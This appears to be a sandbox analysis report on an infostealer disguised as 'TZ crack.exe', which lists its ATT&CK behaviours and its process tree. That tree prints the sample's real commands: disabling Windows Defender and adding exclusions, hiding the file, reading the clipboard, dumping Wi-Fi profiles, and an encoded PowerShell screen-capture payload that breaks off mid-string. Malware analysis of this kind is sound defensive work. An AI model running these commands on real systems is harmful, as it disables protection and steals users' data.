b392615e4ed0b6b2115a488494bdbae407a065c61747a27f8fa014f1cfdf5d62

Analysis

max time kernel
106s
max time network
114s
platform
windows10-2004_x64
resource
win10v2004-20250410-en
resource tags

arch:x64arch:x86image:win10v2004-20250410-enlocale:en-usos:windows10-2004-x64system
submitted
15/04/2025, 17:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

TZ crack.exe
Size

6.1MB
MD5

23f797a105666948bf4bddad600d0550
SHA1

22d7df6c24e5e1f4670a74a827019148e4f88cdd
SHA256

b392615e4ed0b6b2115a488494bdbae407a065c61747a27f8fa014f1cfdf5d62
SHA512

5514b35033ffef9d1470113ee3bac19bd906fcdb1695ef58ace13448fcee9f91c9a1d435a86d9626c714e9c4b25a4fbcb2d10b0a516d6b17c31219a73dfe8168
SSDEEP

196608:uWqF7K0veN/FJMIDJf0gsAGK4RPnAK+gcPTZ:sK0s/Fqyf0gstPAKs

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4740	powershell.exe
436	powershell.exe
4324	powershell.exe
4928	powershell.exe
4384	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	TZ crack.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3284	cmd.exe
4416	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5240	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe
5668	TZ crack.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
30	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
2560	tasklist.exe
3092	tasklist.exe
4928	tasklist.exe
4916	tasklist.exe
2064	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3792	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0007000000024019-21.dat	upx
behavioral1/memory/5668-25-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp	upx
behavioral1/files/0x0007000000024013-47.dat	upx
behavioral1/files/0x0007000000024012-46.dat	upx
behavioral1/files/0x0007000000024010-44.dat	upx
behavioral1/memory/5668-48-0x00007FFAFAA30000-0x00007FFAFAA3F000-memory.dmp	upx
behavioral1/files/0x000700000002400f-51.dat	upx
behavioral1/memory/5668-52-0x00007FFAF60F0000-0x00007FFAF611D000-memory.dmp	upx
behavioral1/memory/5668-50-0x00007FFAF8DB0000-0x00007FFAF8DC9000-memory.dmp	upx
behavioral1/files/0x000700000002400b-49.dat	upx
behavioral1/files/0x0007000000024016-33.dat	upx
behavioral1/memory/5668-30-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp	upx
behavioral1/files/0x0007000000024011-45.dat	upx
behavioral1/files/0x000700000002400e-42.dat	upx
behavioral1/files/0x000700000002400d-41.dat	upx
behavioral1/files/0x000700000002401e-39.dat	upx
behavioral1/files/0x000700000002401d-38.dat	upx
behavioral1/files/0x000700000002401c-37.dat	upx
behavioral1/files/0x0007000000024018-34.dat	upx
behavioral1/files/0x0007000000024017-31.dat	upx
behavioral1/files/0x000700000002400c-28.dat	upx
behavioral1/memory/5668-58-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp	upx
behavioral1/memory/5668-60-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp	upx
behavioral1/memory/5668-62-0x00007FFAF60D0000-0x00007FFAF60E9000-memory.dmp	upx
behavioral1/memory/5668-64-0x00007FFAF9930000-0x00007FFAF993D000-memory.dmp	upx
behavioral1/memory/5668-66-0x00007FFAF60A0000-0x00007FFAF60CE000-memory.dmp	upx
behavioral1/memory/5668-71-0x00007FFAF1B90000-0x00007FFAF1C48000-memory.dmp	upx
behavioral1/memory/5668-74-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp	upx
behavioral1/memory/5668-73-0x00007FFAE1C80000-0x00007FFAE1FF5000-memory.dmp	upx
behavioral1/memory/5668-70-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp	upx
behavioral1/memory/5668-76-0x00007FFAF5F00000-0x00007FFAF5F14000-memory.dmp	upx
behavioral1/memory/5668-78-0x00007FFAF6030000-0x00007FFAF603D000-memory.dmp	upx
behavioral1/memory/5668-80-0x00007FFAE1B60000-0x00007FFAE1C78000-memory.dmp	upx
behavioral1/memory/5668-105-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp	upx
behavioral1/memory/5668-108-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp	upx
behavioral1/memory/5668-160-0x00007FFAF60D0000-0x00007FFAF60E9000-memory.dmp	upx
behavioral1/memory/5668-253-0x00007FFAF60A0000-0x00007FFAF60CE000-memory.dmp	upx
behavioral1/memory/5668-263-0x00007FFAF1B90000-0x00007FFAF1C48000-memory.dmp	upx
behavioral1/memory/5668-272-0x00007FFAE1C80000-0x00007FFAE1FF5000-memory.dmp	upx
behavioral1/memory/5668-282-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp	upx
behavioral1/memory/5668-296-0x00007FFAE1B60000-0x00007FFAE1C78000-memory.dmp	upx
behavioral1/memory/5668-288-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp	upx
behavioral1/memory/5668-287-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp	upx
behavioral1/memory/5668-283-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp	upx
behavioral1/memory/5668-328-0x00007FFAF74A0000-0x00007FFAF74BF000-memory.dmp	upx
behavioral1/memory/5668-336-0x00007FFAE1B60000-0x00007FFAE1C78000-memory.dmp	upx
behavioral1/memory/5668-323-0x00007FFAE1C80000-0x00007FFAE1FF5000-memory.dmp	upx
behavioral1/memory/5668-335-0x00007FFAF6030000-0x00007FFAF603D000-memory.dmp	upx
behavioral1/memory/5668-334-0x00007FFAF5F00000-0x00007FFAF5F14000-memory.dmp	upx
behavioral1/memory/5668-333-0x00007FFAF1B90000-0x00007FFAF1C48000-memory.dmp	upx
behavioral1/memory/5668-332-0x00007FFAF60A0000-0x00007FFAF60CE000-memory.dmp	upx
behavioral1/memory/5668-331-0x00007FFAF9930000-0x00007FFAF993D000-memory.dmp	upx
behavioral1/memory/5668-330-0x00007FFAF60D0000-0x00007FFAF60E9000-memory.dmp	upx
behavioral1/memory/5668-329-0x00007FFAF15A0000-0x00007FFAF1711000-memory.dmp	upx
behavioral1/memory/5668-327-0x00007FFAF60F0000-0x00007FFAF611D000-memory.dmp	upx
behavioral1/memory/5668-326-0x00007FFAF8DB0000-0x00007FFAF8DC9000-memory.dmp	upx
behavioral1/memory/5668-325-0x00007FFAFAA30000-0x00007FFAFAA3F000-memory.dmp	upx
behavioral1/memory/5668-324-0x00007FFAF6120000-0x00007FFAF6144000-memory.dmp	upx
behavioral1/memory/5668-308-0x00007FFAE2000000-0x00007FFAE246E000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2544	cmd.exe
3704	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3156	netsh.exe
1748	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2764	WMIC.exe
1144	WMIC.exe
1548	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
2224	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3704	PING.EXE

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4928	powershell.exe
4740	powershell.exe
4740	powershell.exe
4928	powershell.exe
4384	powershell.exe
4384	powershell.exe
4384	powershell.exe
4416	powershell.exe
4416	powershell.exe
3452	powershell.exe
3452	powershell.exe
4416	powershell.exe
3452	powershell.exe
436	powershell.exe
436	powershell.exe
4156	powershell.exe
4156	powershell.exe
4324	powershell.exe
4324	powershell.exe
424	powershell.exe
424	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4916	tasklist.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe
Token: SeIncreaseQuotaPrivilege	4532	WMIC.exe
Token: SeSecurityPrivilege	4532	WMIC.exe
Token: SeTakeOwnershipPrivilege	4532	WMIC.exe
Token: SeLoadDriverPrivilege	4532	WMIC.exe
Token: SeSystemProfilePrivilege	4532	WMIC.exe
Token: SeSystemtimePrivilege	4532	WMIC.exe
Token: SeProfSingleProcessPrivilege	4532	WMIC.exe
Token: SeIncBasePriorityPrivilege	4532	WMIC.exe
Token: SeCreatePagefilePrivilege	4532	WMIC.exe
Token: SeBackupPrivilege	4532	WMIC.exe
Token: SeRestorePrivilege	4532	WMIC.exe
Token: SeShutdownPrivilege	4532	WMIC.exe
Token: SeDebugPrivilege	4532	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4532	WMIC.exe
Token: SeRemoteShutdownPrivilege	4532	WMIC.exe
Token: SeUndockPrivilege	4532	WMIC.exe
Token: SeManageVolumePrivilege	4532	WMIC.exe
Token: 33	4532	WMIC.exe
Token: 34	4532	WMIC.exe
Token: 35	4532	WMIC.exe
Token: 36	4532	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4532	WMIC.exe
Token: SeSecurityPrivilege	4532	WMIC.exe
Token: SeTakeOwnershipPrivilege	4532	WMIC.exe
Token: SeLoadDriverPrivilege	4532	WMIC.exe
Token: SeSystemProfilePrivilege	4532	WMIC.exe
Token: SeSystemtimePrivilege	4532	WMIC.exe
Token: SeProfSingleProcessPrivilege	4532	WMIC.exe
Token: SeIncBasePriorityPrivilege	4532	WMIC.exe
Token: SeCreatePagefilePrivilege	4532	WMIC.exe
Token: SeBackupPrivilege	4532	WMIC.exe
Token: SeRestorePrivilege	4532	WMIC.exe
Token: SeShutdownPrivilege	4532	WMIC.exe
Token: SeDebugPrivilege	4532	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4532	WMIC.exe
Token: SeRemoteShutdownPrivilege	4532	WMIC.exe
Token: SeUndockPrivilege	4532	WMIC.exe
Token: SeManageVolumePrivilege	4532	WMIC.exe
Token: 33	4532	WMIC.exe
Token: 34	4532	WMIC.exe
Token: 35	4532	WMIC.exe
Token: 36	4532	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeSecurityPrivilege	2764	WMIC.exe
Token: SeTakeOwnershipPrivilege	2764	WMIC.exe
Token: SeLoadDriverPrivilege	2764	WMIC.exe
Token: SeSystemProfilePrivilege	2764	WMIC.exe
Token: SeSystemtimePrivilege	2764	WMIC.exe
Token: SeProfSingleProcessPrivilege	2764	WMIC.exe
Token: SeIncBasePriorityPrivilege	2764	WMIC.exe
Token: SeCreatePagefilePrivilege	2764	WMIC.exe
Token: SeBackupPrivilege	2764	WMIC.exe
Token: SeRestorePrivilege	2764	WMIC.exe
Token: SeShutdownPrivilege	2764	WMIC.exe
Token: SeDebugPrivilege	2764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2764	WMIC.exe
Token: SeRemoteShutdownPrivilege	2764	WMIC.exe
Token: SeUndockPrivilege	2764	WMIC.exe
Token: SeManageVolumePrivilege	2764	WMIC.exe
Token: 33	2764	WMIC.exe
Token: 34	2764	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5892 wrote to memory of 5668	5892	TZ crack.exe	84
PID 5892 wrote to memory of 5668	5892	TZ crack.exe	84
PID 5668 wrote to memory of 4060	5668	TZ crack.exe	87
PID 5668 wrote to memory of 4060	5668	TZ crack.exe	87
PID 5668 wrote to memory of 5508	5668	TZ crack.exe	88
PID 5668 wrote to memory of 5508	5668	TZ crack.exe	88
PID 5668 wrote to memory of 1676	5668	TZ crack.exe	90
PID 5668 wrote to memory of 1676	5668	TZ crack.exe	90
PID 4060 wrote to memory of 4928	4060	cmd.exe	93
PID 4060 wrote to memory of 4928	4060	cmd.exe	93
PID 5508 wrote to memory of 4740	5508	cmd.exe	94
PID 5508 wrote to memory of 4740	5508	cmd.exe	94
PID 1676 wrote to memory of 4916	1676	cmd.exe	95
PID 1676 wrote to memory of 4916	1676	cmd.exe	95
PID 5668 wrote to memory of 4828	5668	TZ crack.exe	97
PID 5668 wrote to memory of 4828	5668	TZ crack.exe	97
PID 4828 wrote to memory of 4532	4828	cmd.exe	99
PID 4828 wrote to memory of 4532	4828	cmd.exe	99
PID 5668 wrote to memory of 824	5668	TZ crack.exe	100
PID 5668 wrote to memory of 824	5668	TZ crack.exe	100
PID 824 wrote to memory of 4064	824	cmd.exe	102
PID 824 wrote to memory of 4064	824	cmd.exe	102
PID 5668 wrote to memory of 4976	5668	TZ crack.exe	103
PID 5668 wrote to memory of 4976	5668	TZ crack.exe	103
PID 4976 wrote to memory of 1500	4976	cmd.exe	105
PID 4976 wrote to memory of 1500	4976	cmd.exe	105
PID 5668 wrote to memory of 5632	5668	TZ crack.exe	106
PID 5668 wrote to memory of 5632	5668	TZ crack.exe	106
PID 5632 wrote to memory of 2764	5632	cmd.exe	108
PID 5632 wrote to memory of 2764	5632	cmd.exe	108
PID 5668 wrote to memory of 3696	5668	TZ crack.exe	109
PID 5668 wrote to memory of 3696	5668	TZ crack.exe	109
PID 3696 wrote to memory of 1144	3696	cmd.exe	111
PID 3696 wrote to memory of 1144	3696	cmd.exe	111
PID 5668 wrote to memory of 3792	5668	TZ crack.exe	112
PID 5668 wrote to memory of 3792	5668	TZ crack.exe	112
PID 5668 wrote to memory of 5220	5668	TZ crack.exe	113
PID 5668 wrote to memory of 5220	5668	TZ crack.exe	113
PID 5220 wrote to memory of 4384	5220	cmd.exe	116
PID 5220 wrote to memory of 4384	5220	cmd.exe	116
PID 3792 wrote to memory of 5132	3792	cmd.exe	117
PID 3792 wrote to memory of 5132	3792	cmd.exe	117
PID 5668 wrote to memory of 5732	5668	TZ crack.exe	118
PID 5668 wrote to memory of 5732	5668	TZ crack.exe	118
PID 5668 wrote to memory of 4996	5668	TZ crack.exe	119
PID 5668 wrote to memory of 4996	5668	TZ crack.exe	119
PID 5732 wrote to memory of 2064	5732	cmd.exe	122
PID 5732 wrote to memory of 2064	5732	cmd.exe	122
PID 4996 wrote to memory of 2560	4996	cmd.exe	123
PID 4996 wrote to memory of 2560	4996	cmd.exe	123
PID 5668 wrote to memory of 3036	5668	TZ crack.exe	124
PID 5668 wrote to memory of 3036	5668	TZ crack.exe	124
PID 5668 wrote to memory of 3284	5668	TZ crack.exe	125
PID 5668 wrote to memory of 3284	5668	TZ crack.exe	125
PID 5668 wrote to memory of 4672	5668	TZ crack.exe	127
PID 5668 wrote to memory of 4672	5668	TZ crack.exe	127
PID 5668 wrote to memory of 1716	5668	TZ crack.exe	129
PID 5668 wrote to memory of 1716	5668	TZ crack.exe	129
PID 5668 wrote to memory of 1748	5668	TZ crack.exe	132
PID 5668 wrote to memory of 1748	5668	TZ crack.exe	132
PID 5668 wrote to memory of 2236	5668	TZ crack.exe	134
PID 5668 wrote to memory of 2236	5668	TZ crack.exe	134
PID 3036 wrote to memory of 5924	3036	cmd.exe	135
PID 3036 wrote to memory of 5924	3036	cmd.exe	135

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5132	attrib.exe
4396	attrib.exe
5348	attrib.exe

C:\Users\Admin\AppData\Local\Temp\TZ crack.exe
"C:\Users\Admin\AppData\Local\Temp\TZ crack.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5892
- C:\Users\Admin\AppData\Local\Temp\TZ crack.exe
  "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TZ crack.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\TZ crack.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1676
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:824
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4976
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1500
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:2764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3792
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe"
      4⤵
      Views/modifies file attributes
      PID:5132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‌ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5220
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎‌ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4384
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5732
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:5924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3284
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4672
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1716
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1748
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:3156
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2236
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:5116
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsA